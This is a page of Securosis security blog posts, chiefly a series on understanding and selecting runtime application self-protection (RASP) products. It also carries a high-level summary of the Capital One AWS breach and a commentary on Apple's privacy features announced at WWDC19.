Understanding and Selecting RASP 2019: Integration

Posted under:

Editors note we have been having some VPN interruptions so I apologize for the uneven cadence these posts are being delivered. We are working on fixing the issue.

In this section we outline how RASP fits both into the technology stack, both during production deployment and build processes to create applications. We will show what that looks like and why it’s important to fit within these models for newer application security technologies. And we will close this section with a discussion of how RASP differs from other security technologies, and discuss advantages and tradeoffs between differing approaches.

As we mentioned in the introduction, our research into DevOps unearthed many questions on RASP. The questions came from non-traditional buyers of security products; application developers and product managers. Their teams, by and large, were running Agile development processes. And they wanted to know if RASP could effectively block attacks and fit within their process.

I filtered the hundreds of the customer call notes over the last two years, and the following are the top 7 RASP questions customers asked, more or less in order of how often often it was asked:

  • We presently use static analysis in our build process, but we are looking for solutions that scan code more quickly and we would also like a ‘preventative’ option. Can RASP help?
  • Development releases code twice daily, which is a little scary, because we only scan with static analysis once a week/month. Is RASP a suitable protection to fill in the gaps between scans?
  • We would like a solution that provides some 0-day protection at runtime, and sees the application calls.
  • Development is moving to a micro-services architecture, and WAF only provides visibility at the edge. Can we embed monitoring and blocking into micro-services?
  • We have lots applications with technical debt in security, our in-house and third party sourced code is not fully scanned, and we need CSS/XSRF/Injection protection. Should we look at WAF or RASP?
  • We are looking at a ‘defense in depth’ approach to application security and want to know if we can run WAF with RASP?
  • We want to ‘shift left’, both move security as early as possible, but also embed application security into the application development process, and we would like to know if RASP can help?

Why do we bring these questions up here? To show how the changes in application deployments, speed of application development, and the reduced capacity for WAF are generating the interest in RASP. And it is those changes we want to show here to provide a better understanding of how RASP addresses the new requirements.

Build Integration

The majority of firms we spoke with are leveraging automation to provide Continuous Integration — essentially automated building and testing of applications as new code was checked in. Some had gone as far as Continuous Deployment (CD) and DevOps. To address this development-centric perspective, we offer the diagram below to illustrate a modern Continuous Deployment / DevOps application build environment. Consider each arrow a script automating some portion of source code control, building, packaging, testing, or deployment of an application.

This is what the build pipeline looks like. Each time application code is checked in, or each time a configuration change is made in a configuration management tool (e.g. Chef, Puppet, Ansible, Salt) the build server (e.g. Jenkins, Bamboo, MSBuild, CircleCI) will grab the most recent bundle of code, templates and configuration, and build the product. This may result in the creation of a machine image, a container or an executable. If the build is successful, a test environment is automatically started, and a batter of functional, regression and security tests are started. If the new code passes these tests it is passed along to QA or put into pre-production to await final approval / rollout to production.

This degree of automation in the build and QA processes is how development teams are faster and more agile. Some firms release code into production ten times a day. It is because of the sheer speed created by automation that security needs to find ways to deploy security technologies that can keep pace with development. That means selection of tools that embed into this pipeline.

Production Integration

If the build pipeline gives us a mechanical view of development, if we take a more process centric view, we get a different picture of where security technologies can fit. The following diagram shows different logical phases in the process of code development, each phased staffed by people who perform a different role (e.g. architects, developers, build managers, QA, release management, IT and IT Security). While the step by step nature of this diagram may imply a waterfall development, do not be mislead, as these phases apply to any development process, including spiral, waterfall and agile.

The graphic below illustrates the major phases teams go through. The callouts map the common types of security tests at specific phases within a Waterfall, Agile, CI, and DevOps frameworks. Keep in mind that it is still early days for automated deployment and DevOps. Many security tools were built before rapid and automated deployment existed or were well known. Older products are typically too slow, some cannot focus their tests on new code, and others do not offer API support. So orchestration of security tools — basically what works where — is still maturing. The time each type of test takes to run, and the type of result it returns, drives where it fits best into the phases above.

RASP is designed to be bundled into applications, so it is part of the application delivery process. RASP components can be included as part of the application, typically installed and configured under a configuration management script, so it starts up along with the application stack. RASP offers two distinct approaches to help tackle application security. The first is in the pre-release / pre-deployment phase, while the second is in production. In pre-release it is used to instrument an application, and to ensure that it is detecting pen tests, red team tests or other synthetic attacks launched against the app during testing. In the later, it is deployed as a monitoring and blocking tool. Either way, deployment looks very similar.

  • Pre-release testing: This is exactly what it sounds like: RASP is used when the application is fully constructed and going through final tests prior to being launched. Here RASP can be deployed in several ways. It can be deployed to monitor only, using application tests and instrumenting runtime behavior to learn how to protect the application. Alternatively RASP can monitor while security tests are invoked in an attempt to break the application, with RASP performing security analysis and transmitting its results. Development and Testing teams can learn whether RASP detected the tested attacks. Finally, RASP can be deployed in full blocking mode to see whether security tests were detected and blocked, and how they impacted the user experience. This provides an opportunity to change application code or augment the RASP rules before the application goes into production.
  • Production testing: Once an application is placed in a production environment, either before actual customers are using it (using Blue-Green deployment) or afterwards, RASP can be configured to block malicious application requests. Regardless of how the RASP tool works (whether via embedded runtime libraries, servlet filters, in-memory execution monitoring, application instrumentation or virtualized code paths), it protects applications by detecting attacks in live runtime behavior. This model essentially provides execution path scanning, monitoring all user requests and parameters. Unlike technologies which block requests at the network or web proxy layer, RASP inspects requests at the application layer, which means it has full access to the application’s inner workings. Working at the API layer provides better visibility to determine whether a request is malicious, and more focused blocking capabilities than external security products.
  • Runtime protection: Ultimately RASP is not just for testing, but for full runtime protection and blocking of attacks. Not just the typical cross-site scripting (CSS), SQL-Injection (SQLi), cross-site request forgeries (XSRF) or other drive by attacks, but malicious code execution, weak authentication, improper session management, use of vulnerable 3rd party software, and misuse of custom code. And it understands attacks specific to the platforms (e.g.: .NET, Java) and application frameworks (e.g.: Spring, Struts, Play). RASP is in a unique position to protect application from a broad set of application attacks. Again, monitoring and protecting at the application layer provides subtle context and behavioral clues that provide substantial improvement in detection with low to no false positives.
  • Development & IAST: Some RASP platforms also double as IAST – or Interactive Application Security Testing – tools. This means they can be ‘shifted left’ to the point of code creation, and provide testing benefits before code is checked in or built. Testing in development is not as common as many developers are not in the habit of – nor are they incentivized too – test prior to checking in code. But these types of testing tools have the benefit of finding many security flaws early in the process and educating developers on how to build secure code.

To WAF or not to WAF

Most organizations we spoke with stated their basic requirement was for something to work within their development pipeline. WAF’s lack of APIs for automatic setup, the time needed to learn application behavior, and most importantly the ability to pinpoint vulnerable code modules, were all cited as reasons WAF failed to satisfy developers. Granted, these requests came from more ‘Agile’ teams, more often building new applications than maintaining existing platforms. Still, we heard consistently that RASP meets a market demand unsatisfied by other application security technologies.

Note that WAF was already in place with almost every client we spoke with and there was no intent to remove the existing technology. Some cited PCI-DSS as the reason for leaving it, some cited a ‘defense in depth’ strategy, while others were still not fully comfortable with RASP to perform a ‘rip & replace’. So for most who adopt RASP, it is run with WAF.

It is important to recognize that these technologies are complementary, not necessarily competitive. There is absolutely no reason you can’t run RASP behind your existing WAF. Some organizations use cloud-based WAF as front-line protection, while embedding RASP into applications. Some use WAF to provide “threat intelligence”, DDoS protection, and network security, while using RASP to fine-tune application security — often supplanting WAF’s ‘white listing’ capability. Still others double down with overlapping security functions, much the way many organizations use layered anti-spam filters, accepting redundancy for broader coverage or unique benefits from each product. WAF platforms have a good ten-year head start, with broader coverage and very mature platforms, so some firms are loath to throw away WAF until RASP is fully proven, or until RASP is viewed as an acceptable compensating control for regulations like PCI-DSS.

– Adrian Lane
(0) Comments
Subscribe to our daily email digest

Understanding and Selecting RASP 2019: Technology

Posted under: Heavy Research

Here we discuss technical facets of RASP products, including how the technology works, how it integrates into an application environment, and the advantages of each approach. We will also outline some important considerations, such as platform support, which will impact your selection process. We will also consider a couple aspects of RASP technology which we expect to evolve over next couple years.

How The Technology Works

Over the last couple of years the RASP market has settled on a couple basic approaches to RASP, with different variations on these approaches to enhance detection, reliability or performance. Understanding the technology should greatly assist the reader in understanding the strengths and weaknesses of the RASP offering.

  • Instrumentation: With this deployment model RASP places sensors/callbacks at key junctions within the application stack to see application behavior within — and between — custom code, application libraries, frameworks and underlying operating system. This approach is commonly implemented by using native application profiler/instrumentation APIs to monitor application behavior at runtime. When a sensor is hit, RASP gets a callback and evaluates the request against the appropriate subset of policies relevant to the request and application context. For example, database queries will result in examination of the request for SQL Injection (SQLi). But they also provide request de-serialization ‘sandboxing’ to detect malicious payloads, and what I prefer to call ‘checkpointing’, where a request that hits checkpoint A but bypasses checkpoint B can deterministically said to be hostile. These approaches provide far more advanced application monitoring than WAF, with nuanced detection of attacks and misuse. However, it does require the solution to monitor all relevant interfaces to provide full visibility, at some cost to performance and scalability. Essentially a balancing act between thorough coverage and performance.
  • Servlet Filters & Plugins: Some RASP platforms are implemented as web server plug-ins or Java Servlets, typically installed into either Apache Tomcat, JBOSS or Microsoft .NET to process requests. Plugins filter requests before they execute functions like database queries or transactions, applying detection rules to each request received. Requests that match known attack signatures are blocked. They offer not less function than a WAF Blacklist, with some added protections such as lexical analysis of inbound request structures. This is a simple approach for retrofitting protection into the application environment, and is effective at blocking malicious requests, but it doesn’t offer the depth application understanding possible with other integration approaches
  • Library or JVM replacement: Some RASP products are installed by replacing the standard application libraries, JAR files, and at least one vendor offers full replacement of the Java Virtual Machine. This method basically hijacks calls to the underlying platform into a custom application. The RASP platform passively ‘sees’ application calls to supporting functions, applying rules as requests are intercepted. For example, in the case of JVM replacement, the RASP can alter classes as they are loaded into memory, augmenting or patching the application and application stack. Like Instrumentation, this approach provides complete visibility of the application behaviors and performs analysis of user requests. Some customers we spoke with preferred the automated application of platform patches, but the majority were uncomfortable with dynamic alteration of the application stack in production.
  • Instrumentation & Static Hybrid: Like many firewalls, some RASP platforms can deploy as a reverse proxy, and several RASP vendors offer this as an option. In one case there is a novel variant that couples the proxy, an Instrumentation module, and parts of a static analysis scan. Essentially it generates a Code-Property-Graph – like a static analysis tool – to build custom security controls for all application and open source functions. This approach requires full integration into the application build pipeline in order to scan all source code in. It then bundles the scan result into the RASP engine as the application is deployed, effectively providing an application specific form of functionality whitelist. The security controls tailored to the application, offering excellent code coverages, at the expense of full build integration, the need to regularly rebuild the CPG profile, along with some added latency for security checks.

There have been several other small companies that have come and gone over the last couple of years, with a mixture of application logic crawlers (DAST) rule sets, application virtualization to mimic the replacement model listed above, and mirroring runtimes in cloud services. The full virtualization approach was interesting, but being too early to market and being dead wrong in approach are virtually indistinguishable. Still, I expect over time we will see new variations on RASP detection capabilities, possibly in the area of AI, and new cloud services for added layers of support.

Detection

How RASP products detect attacks is complicated, with multiple techniques being employed depending upon the type of request being made. Most examine both the requests and associated parameters, and each are subject to multiple types of inspection. The good news is that RASP is far more effective in detection of application attacks. Unlike other technologies which use signature based detection, RASP fully decodes parameters and external references, maps application functions and 3rd party code usage, maps execution sequences, de-serializes payloads and applies polices accordingly. This not only allows for more accurate detection, but helps with performance as which checks are performed are optimized to the context of the request and execution path within the code. As rules are enforced at the point of use, it is far easier to to understand proper usage and detect misuse.

Most RASP platforms employ structural analysis as well. They understand what framework is in use, and the common set of vulnerabilities the framework suffers. As RASP understands the entire application stack, it can detect variations in 3rd party code libraries —- essentially a vulnerability scan of open source —- to determine if outdated code is being used. And RASP can quickly vet incoming requests and detect injection attacks. There are several approaches; one such approach is achieved by a form of tokenization — substituting parameters for a tokens — in order to quickly check that any given request matches its intended structure. For example, tokenizing clauses and parameters in a SQL query, you can quickly detect when a ‘FROM’ or ‘WHERE’ clause has more tokens than it should, meaning the query has been altered.

Blocking

When an attack is detected, as RASP is within the application, most products throw and application error. In this way the the malicious request is not forwarded, and the application is responsible for a graceful response and maintaining application state. Products that offer full instrumentation can block the execution sequence during runtime, when something bad is detected but prior to execution. What is reported to the user is entirely up to the application developers. That said, this can create issues with server side application stability and user experience. RASP offers some capabilities to tune response behaviors, but this should be examined on a vendor by vendor basis.

Language Support

The single biggest growing pain for the RASP vendor community has been language support. Java, Javascript, C# and Visual Basic may comprise the bulk of application code developed, but Python, Ruby, PHP, Go and numerous others are in wide use. For each vendor we spoke with during our research, language support was a large part of their product roadmap. Most provide full support for core platforms like Java and .NET; beyond that support still a little spotty. You will need to check with your vendor on what is supported, and what versions.

Another part of the problem is the complexity of the environment; not just the server side but the client side as well. Over the last few years we have witnessed an expanding universe of frameworks, client side utilities, web-facing APIs and changing fashions for data encoding. Consider that RASP needs to parse XML and JSON, handle diverse clients running Javascript and Angular.js, micro-service architectures and possibly multiple versions of APIs all at the same time. The diversity of application environments makes it challenging for all RASP vendors to provide full support. If your application doesn’t run on a standard platform you will need to discuss support in great detail with the vendors prior to purchase. Within the next year or two we expect this issue to largely go away, but for now it is a key decision factor for buyers.

Performance and Scalability

As RASP embeds within the application or the supporting application stack, once bundled with the application, it scales with that application. For example, if the scalability model means more copies of the application running on more server instances, RASP will be run atop more server instances as well. If deployed on virtual or cloud servers, RASP benefits from added CPU and memory resources along with the application.

From the latency and performance perspectives, RASP enforcement rules — both how they operate and the number of checks employed — should be considered. The more analysis applied to incoming requests grants better security, but comes at a cost of latency. If third party threat intelligence is not cached locally, or or external lookups are used, latency increases. If the sensors or integration points are purely event collection, and the events are passed to another external server for analysis, the added services with increased latency. As we recommend with all security products, don’t trust vendor supplied numbers, rather run tests in your environment with traffic that represents real application usage. And as vendors have applied considerable engineering resources to performance over the last couple years, latency issues have been far less common.

Instrumentation

Security teams often want visibility into application security, and it is increasingly common for them to use scans in the build pipe-line, pre-production and production to create metrics and visibility into application security posture. This tells them both where they need to deploy more resources, but also allows them to better gauge the effectiveness of the resources that they have already deployed.

One huge advantage of RASP is it can instrument application usage and defect rates. Part of this capabilities is what we mentioned above: RASP can catalog application functions, understand the correct number and type of parameters, and then apply policies within the code of the running application. But it also can understand runtime code paths, server interaction, open source, nuances of frameworks, library usage, and custom code. This offers advantages in the ability to tailor detection rules, such as employing specific policies to detect attacks against the Spring framework. It can be set to block specific attacks against older versions of libraries, providing a form of virtual patching. This also offers non-security related benefits to developers, quality assurance and operations teams to show how code is used, providing a runtime map which shows things like performance bottlenecks and unused code.

– Adrian Lane
(0) Comments
Subscribe to our daily email digest

Understanding and Selecting RASP 2019: Use Cases

Posted under: Heavy Research

The primary function of RASP is to protect web applications against known and emerging threats. In some cases it is deployed to block attacks at the application layer, before vulnerabilities can be exploited, but in many cases RASP tools process a request until it detects an attack and then blocks the action.

Astute readers will notice that these are basically the classic use cases for Intrusion Detection Systems (IDS) and Web Application Firewalls (WAFs). So why look for something new, if other tools in the market already provide the same application security benefits? The answer is not in what RASP does, but rather in how it does works, which makes it more effective in a wide range of scenarios.

Let’s delve into detail about what clients are asking for, so we can bring this into focus.

Primary Market Drivers

RASP is a relatively new technology, so current market drivers are tightly focused on addressing the security needs of two distinct “buying centers” which have been largely unaddressed by existing security applications. We discovered this important change since our last report in 2017 through hundreds of conversations with buyers, who expressed remarkably consistent requirements. The two “buying centers” are security and application development teams. Security teams are looking for a reliable WAF replacement without burdensome management requirements, and development teams ask for a security technology to protect applications within the framework of existing development processes.

The security team requirement is controversial, so let’s start with some background on WAF functions and usability. It’s is essential to understand the problems driving firms toward RASP.

Web Application Firewalls typically employ two methods of threat detection; blacklisting and whitelisting. Blacklisting is detection – and often blocking – of known attack patterns spotted within incoming application requests. SQL injection is a prime example. Blacklisting is useful for screening out many basic attacks against applications, but new attack variations keep showing up, so blacklists cannot stay current, and attackers keep finding ways to bypass them. SQL injection and its many variants is the best illustration.

But whitelisting is where WAFs provide their real value. A whitelist is created by watching and learning acceptable application behaviors, recording legitimate behaviors over time, and preventing any requests which do not match the approved behavior list. This approach offers substantial advantages over blacklisting: the list is specific to the application monitored, which makes it feasible to enumerate good functions – instead of trying to catalog every possible malicious request – and therefore easier (and faster) to spot undesirable behavior.

Unfortunately, developers complain that in the normal course of application deployment, a WAF can never complete whitelist creation – ‘learning’ – before the next version of the application is ready for deployment. The argument is that WAFs are inherently too slow to keep up with modern software development, so they devolve to blacklist enforcement. Developers and IT teams alike complain that WAF is not fully API-enabled, and that setup requires major manual effort. Security teams complain they need full-time personnel to manage and tweak rules. And both groups complain that, when they try to deploy into Infrastructure as a Service (IaaS) public clouds, the lack of API support is a deal-breaker. Customers also complain of deficient vendor support beyond basic “virtual appliance” scenarios – including a lack of support for cloud-native constructs like application auto-scaling, ephemeral application stacks, templating, and scripting/deployment support for the cloud. As application teams become more agile, and as firms expand their cloud footprint, traditional WAF becomes less useful.

To be clear, WAF can provide real value – especially commercial WAF “Security as a Service” offerings, which focus on blacklisting and some additional protections like DDoS mitigation. These are commonly run in the cloud as a proxy service, often filtering requests “in the cloud” before they pass into your application and/or RASP solution. But they are limited to a ‘Half-a-WAF’ role – without the sophistication or integration to leverage whitelisting. Traditional WAF platforms continue to work for on-premise applications with slower deployment, where the WAF has time to build and leverage a whitelist. So existing WAF is largely not being “ripped and replaced”, but it is largely unused in the cloud and by more agile development teams.

So security teams are looking for an effective application security tool to replace WAF, which is easier to manage. They need to cover application defects and technical debt – not every defect can be fixed in a timely fashion in code.

Developer requirements are more nuanced: they cite the same end goal, but tend to ask which solutions can be fully embedded into existing application build and certification processes. To work with development pipelines, security tools need to go the extra mile, protecting against attacks and accommodating the disruption underway in the developer community. A solution must be as agile as application development, which often starts with compatible automation capabilities. It needs to scale with the application, typically by being bundled with the application stack at build time. It should ‘understand’ the application and tailor its protection to the application runtime. A security tool should not require that developers be security experts. Development teams working to “shift left” to get security metrics and instrumentation earlier in their process want tools which work in pre-production, as well as production.

RASP offers a distinct blend of capabilities and usability options which make it a good fit for these use cases. This is why, over the last three years, we have been fielding several calls each week to discuss it.

Functional Requirements

The market drivers mentioned above change traditional functional requirements – the features buyers are looking for.

  • Effectiveness: This seems like an odd buyer requirement. Why buy a product which does not actually work? But many security tools don’t work well, produce too many false positives to be usable, or require so much maintenance that building your bespoke seems like a better investment. RASP typically provides full capabilities without the need for run-time learning of application functions, offers broader coverage of application threats by running in the application context, and can run in blocking mode. This last is especially important in light of current application threats, such as the Capital One cloud hack.
  • API Support & Automation: Most of our readers know what Application Programming Interfaces (API) are and how they are used. Less well-known is the rapidly expanding need for programatic interfaces in security products, thanks to application delivery disruptions brought by cloud services and DevOps. APIs are how we orchestrate building, testing, and deployment of applications. Security products like RASP offer full platform functionality via API – sometimes as build server plug-ins or even as cloud services – enabling software engineers to work with RASP in their native metaphor. And they provide agents, containers, or plug-ins which work within the application stack.
  • Application Awareness: As attackers continue to move up the stack, from networks to servers to applications, attacks tailored to application frameworks and languages are becoming the norm. RASP differentiates on its ability to include application context in security policies. Many WAFs offer ‘positive’ security capabilities (whitelisting valid application requests), but embedding within applications provides additional application access and instrumentation to RASP. Further, some RASP platforms assist developers by referencing modules or lines of suspect code. For many development teams, better detection capabilities are less important than having RASP pinpoint vulnerable code.
  • Pre-Deployment Validation: The earlier in the production cycle errors are discovered, the easier – and cheaper – they are to fix. This is especially important for expensive of dangerous technologies such as cars and pacemakers. So testing in general, and security testing in particular, works better earlier in the development process. Rather than relying on vulnerability scanners and penetration testers after application deployment, more and more application security testing is performed pre-deployment. Of course this is possible with other application-centric tools, but RASP is easier to build into automated testing, can often determine which parts of an application have vulnerabilities, and is commonly used during red-team exercises and pre-production ‘blue/green’ deployment scenarios.

When we wrap up this series with a buyer’s guide, we will examine other technical differentiators which come into play during evaluation.

Next we will discuss the three major architectural approaches RASP vendors employ to deliver their solutions.

– Adrian Lane
(0) Comments
Subscribe to our daily email digest

Understanding and Selecting RASP: 2019

Posted under: Heavy Research

During our 2015 DevOps research conversations, developers consistently turned the tables on us, asking dozens of questions about embedding security into their development process. We were surprised to discover how much developers and IT teams are taking larger roles in selecting security solutions, working to embed security products into tooling and build processes. Just like they use automation to build and test product functionality, they automate security too.

But the biggest surprise was that every team asked about RASP, Runtime Application Self-Protection. Each team was either considering RASP or already engaged in a proof-of-concept with a RASP vendor. This was typically in response to difficulties with existing Web Application Firewalls (WAF) – most teams still carry significant “technical debt”, which requires runtime application protection. Since 2017 we have engaged in over 200 additional conversations on what gradually evolved into ‘DevSecOps’ – with both security and development groups asking about RASP, how it deploys, and benefits it can realistically provide. These conversations solidified the requirement for more developer-centric security tools which offer the agility developers demand, provide metrics prior to deployment, and either monitor or block malicious requests in production.

Research Update

Our previous RASP research was published in the summer of 2016. Since then Continuous Integration for application build processes has become the norm, and DevOps is no longer considered wild idea. Developers and IT folks have embraced it as a viable and popular tool for producing more reliable application deployments. But it has raised the bar for security solutions, which now need to be as agile and embeddable as developers’ other tools to be taken seriously. The rise of DevOps has also raised expectations for integration of security monitoring and metrics. We have witnessed the disruptive innovation of cloud services, with companies pivoting from “We are not going to the cloud.” to “We are building out our multi-cloud strategy.” in three short years. These disruptive changes have spotlit the deficiencies of WAF platforms, both lack of agility and inability to go “cloud native”.

Similarly, we have observed advancements in RASP technologies and deployment models. With all these changes it has become increasingly difficult to differentiate one RASP platform from another. So we are kicking off a refresh of our RASP research. We will dive into the new approaches, deployment models, and revised selection criteria for buyers.

Defining RASP

Runtime Application Self-Protection (RASP) is an application security technology which embeds into an application or application runtime environment, examining requests at the application layer to detect attacks and misuse in real time. RASP products typically contain the following capabilities:

  • Unpack and inspect requests in the application context, rather than at the network or HTTP layer
  • Monitor and block application requests; products can sometimes alter requests to strip out malicious content
  • Fully functional through RESTful APIs
  • Protect against all classes of application attacks, and detect whether an attack would succeed
  • Pinpoint the module, and possibly the specific line of code, where a vulnerability resides
  • Instrument application functions and report on usage

As with all our research, we welcome public participation in comments to augment or discuss our content. Securosis is known for research positions which often disagree with vendors, analyst firms, and other researchers, so we encourage civil debate and contribution. The more you add to the discussion, the better the research!

Next we will discuss RASP use cases and how they have changed over the last few years.

– Adrian Lane
(0) Comments
Subscribe to our daily email digest

Firestarter: Multicloud Deployment Structures and Blast Radius

In this, our second Firestarter on multicloud deployments, we start digging into the technological differences between the cloud providers. We start with the concept of how to organize your account(s). Each provider uses different terminology but all support similar hierarchies. From the overlay of AWS organizations to the org-chart-from-the-start of an Azure tenant we dig into the details and make specific recommendations. We also discuss the inherent security barriers and cover a wee bit of IAM.

Watch or listen:


[embedded content]

DisruptOps: Breaking Attacker Kill Chains in AWS: IAM Roles

Breaking Attacker Kill Chains in AWS: IAM Roles

Over the past year I’ve seen a huge uptick in interest for concrete advice on handling security incidents inside the cloud, with cloud native techniques. As organizations move their production workloads to the cloud, it doesn’t take long for the security professionals to realize that the fundamentals, while conceptually similar, are quite different in practice. One of those core concepts is that of the kill chain, a term first coined by Lockheed Martin to describe the attacker’s process. Break any link and you break the attack, so this maps well to combining defense in depth with the active components of incident response.

Read the full post at DisruptOps.

Firestarter: So you want to multicloud?

This is our first in a series of Firestarters covering multicloud. Using more than one IaaS cloud service provider is, well, a bit of a nightmare. Although this is widely recognized by anyone with hands-on cloud experience that doesn’t mean reality always matches our desires. From executives worried about lock in to M&A activity we are finding that most organizations are being pulled into multicloud deployments. In this first episode we lay out the top level problems and recommend some strategies for approaching them.

Watch or listen:


[embedded content]

What We Know about the Capital One Data Breach

I’m not a fan of dissecting complex data breaches when we don’t have any information. In this case we do know more than usual due to the details in the complaint filed by the FBI.

I want to be very clear that this post isn’t to blame anyone and we have only the most basic information on what happened. The only person we know is worthy of blame here is the attacker.

As many people know Capital One makes heavy use of Amazon Web Services. We know AWS was involved in the attack because the federal complaint specifically mentions S3. But this wasn’t a public S3 bucket.

Again, all from the filed complaint:

  • The attacker discovered a server (likely an instance – it had an IAM role) with a misconfigured firewall. It presumably had a software vulnerability or was vulnerable due to to a credential exposure.
  • The attacker compromised the server and extracted out its IAM role credentials. These ephemeral credentials allow AWS API calls. Role credentials are rotated automatically by AWS, and much more secure than static credentials. But with persistent access you can obviously update credentials as needed.
  • Those credentials (an IAM role with ‘WAF’ in the title) allowed listing S3 buckets and read access to at least some of them. This is how the attacker exfiltrated the files.
  • Some buckets (maybe even all) were apparently encrypted, and a lot of the data within those files (which included credit card applications) was encrypted or tokenized. But the impact was still severe.
  • The attacker exfiltrated the data and then discussed it in Slack and on social media.
  • Someone in contact with the attacker saw that information, including attack details in GitHub. This person reported it to Capital One through their reporting program.
  • Capital One immediately involved the FBI and very quickly closed the misconfigurations. They also began their own investigation.
  • They were able to determine exactly what happened very quickly, likely through CloudTrail logs. Those contained the commands issued by that IAM role from that server (which are very easy to find). They could then trace back the associated IP addresses. There are many other details on how they found the attacker in the complaint, and it looks like Capital One did quite a bit of the investigation themselves.

So misconfigured firewall (Security Group?) > compromised instance > IAM role credential extraction > bucket enumeration > data exfiltration. Followed by a rapid response and public notification.

As a side note, it looks like the attacker may have been a former AWS employee, but nothing indicates that was a factor in the breach.

People will say the cloud failed here, but we saw breaches like this long before the cloud was a thing. Containment and investigation seem to have actually run far faster than would have been possible on traditional infrastructure. For example Capital One didn’t need to worry about the attacker turning off local logging – CloudTrail captures everything that touches AWS APIs. Normally we hear about these incidents months or years later, but in this case we went from breach to arrest and disclosure in around two weeks.

I hope that someday Capital One will be able to talk about the details publicly so the rest of us can learn. No matter how good you are, mistakes happen. The hardest problem in security is solving simple problems at scale. Because simple doesn’t scale, and what we do is damn hard to get right every single time.

DisruptOps: Build Your Own Multi-Cloud Security Monitoring in 30 Minutes or Less with StreamAlert

About

Securosis is an information security research and advisory firm dedicated to transparency, objectivity, and quality. We are totally obsessed with improving the practice of information security. Our job is to save you money and help you do your job better and faster by helping you cut through the noise and providing clear, actionable, pragmatic advice on securing your organization.

Following our guiding principle of Totally Transparent Research, we provide nearly all our content for free.

Apple Flexes Its Privacy Muscles

Posted under: Research and Analysis

Apple events follow a very consistent pattern, which rarely changes beyond the details of the content. This consistency has gradually become its own language. Attend enough events and you start to pick up the deliberate undertones Apple wants to communicate, but not express directly. They are the facial and body expressions beneath the words of the slides, demos, and videos.

Five years ago I walked out of the WWDC keynote with a feeling that those undertones were screaming a momentous shift in Apple’s direction. That privacy was emerging as a foundational principle for the company. I wrote up my thoughts at Macworld, laying out my interpretation of Apple’s privacy principles. Privacy was growing in importance at Apple for years before that, but that WWDC keynote was the first time they so clearly articulated that privacy not only mattered, but was being built into foundational technologies.

This year I sat in the WWDC keynote, reading the undertones, and realized that Apple was upping their privacy game to levels never before seen from a major technology company. That beyond improving privacy in their own products, the company is starting to use its market strength to pulse privacy throughout the tendrils that touch the Apple ecosystem.

Regardless of motivations – whether it be altruism, the personal principles of Apple executives, or simply shrewd business strategy – Apple’s stance on privacy is historic and unique in the annals of consumer technology. The real question now isn’t whether they can succeed at a technical level, but whether Apple’s privacy push can withstand the upcoming onslaught from governments, regulators, the courts, and competitors.

Apple has clearly explained that they consider privacy a fundamental human right. Yet history is strewn with the remains of well-intentioned champions of such rights.

How privacy at Apple changed at WWDC19

When discussing these shifts in strategy, at Apple or any other technology firm, it’s important to keep in mind that the changes typically start years before outsiders can see them, and are more gradual than we can perceive. Apple’s privacy extension efforts started at least a couple years before WWDC14, when Apple first started requiring privacy protections to participate in HomeKit and HealthKit.

The most important privacy push from WWDC19 is Sign In with Apple, which offers benefits to both consumers and developers. In WWDC sessions it became clear that Apple is using a carrot and stick approach with developers: the stick is that App Review will require support for Apple’s new service in apps which leverage competing offerings from Google and Facebook, but in exchange developers gain Apple’s high security and fraud prevention. Apple IDs are vetted by Apple and secured with two-factor authentication, and Apple provides developers with the digital equivalent of a thumbs-up or thumbs-down on whether the request is coming from a real human being. Apple uses the same mechanisms to secure iCloud, iTunes, and App Store purchases, so this seems to be a strong indicator.

Apple also emphasized they extend this privacy to developers themselves. That it isn’t Apple’s business to know how developers engage with users inside their apps. Apple serves as an authentication provider and collects no telemetry on user activity. This isn’t to say that Google and Facebook abuse their authentication services, Google denies this accusation and offers features to detect suspicious activity. Facebook, on the other hand, famously abused phone numbers supplied for two-factor authentication, as well as a wide variety of other user data.

The difference between Sign In with Apple and previous privacy requirements within the iOS and Mac ecosystems is that the feature extends Apple’s privacy reach beyond its own walled garden. Previous requirements, from HomeKit to data usage limitations on apps in the App Store, really only applied to apps on Apple devices. This is technically true for Sign In with Apple, but practically speaking the implications extend much further.

When developers add Apple as an authentication provider on iOS they also need to add it on other platforms if they expect customers to ever use anything other than Apple devices. Either that or support a horrible user experience (which, I hate to say, we will likely see plenty of). Once you create your account with an Apple ID, there are considerable technical complexities to supporting non-Apple login credentials for that account. So providers will likely support Sign In with Apple across their platforms, extending Apple’s privacy reach beyond its own platforms.

Beyond sign-in

Privacy permeated WWDC19 in both presentations and new features, but two more features stand out as examples of Apple extending its privacy reach: a major update to Intelligent Tracking Prevention for web advertising, and HomeKit Secure Video. Privacy preserving ad click attribution is a surprisingly ambitious effort to drive privacy into the ugly user and advertising tracking market, and HomeKit Secure Video offers a new privacy-respecting foundation for video security firms which want to be feature competitive without the mess of building (and securing) their own back-end cloud services.

Intelligent Tracking Prevention is a Safari feature to reduce the ability of services to track users across websites. The idea is that you can and should be able to enable cookies for one trusted site, without having additional trackers monitor you as you browse to other sites. Cross-site tracking is endemic to the web, with typical sites embedding dozens of trackers. This is largely to support advertising and answer a key marketing question: did an ad lead to you visit a target site and buy something?

Effective tracking prevention is an existential risk to online advertisements and the sites which rely on them for income, but this is almost completely the fault of overly intrusive companies. Intelligent Tracking Prevention (combined with other browser privacy and security features) is a stick and privacy preserving ad click attribution is the corresponding carrot. It promises to enable advertisers to track conversion rates without violating user privacy. An upcoming feature of Safari, and a proposed web standard, Apple promises that browsers will remember ad clicks for seven days. If a purchase is made within that time period it will be considered a potential ad conversion (sale), and reported as a delayed ephemeral post to the search or advertising provider – using a limited set of IDs which are insufficiently granular to be linked to an individual user, after a random time delay to further frustrate individual user identification.

By providing a privacy-preserving advertising technology inside one of the most important and popular web browsers, then offering it as an open standard, all while making herculean efforts to block invasive tracking, Apple is again leveraging its market position to improve privacy and extend its reach. What’s most interesting is that unlike Sign In with Apple, this improves privacy without directly attacking their advertising-driven competitors’ business models. Google can use this same technology and still track ad conversions, and Apple still supports user-manageable ad identifiers for targeted advertisements, accepting less user data to provide better privacy. Of course, a cynic might ask whether more accurate conversion metrics would hurt advertisers who inflate their numbers.

HomeKit security cameras also get a privacy-preserving update with macOS Catalina and iOS 13. I’m a heavy user of cameras myself, even though they are only marginally useful for preventing crime. Nearly all these systems record to the cloud (including my Arlo cameras). This is a feature customers want, clearly demonstrated by the innumerable crime shows where criminals steal the tapes. The providers also use cloud processing to distinguish people from animals from vehicles and provide offer other useful features. But like many customers, I’m not thrilled that providers also have access to my videos, which is one reason none of them run inside my house when anyone is home.

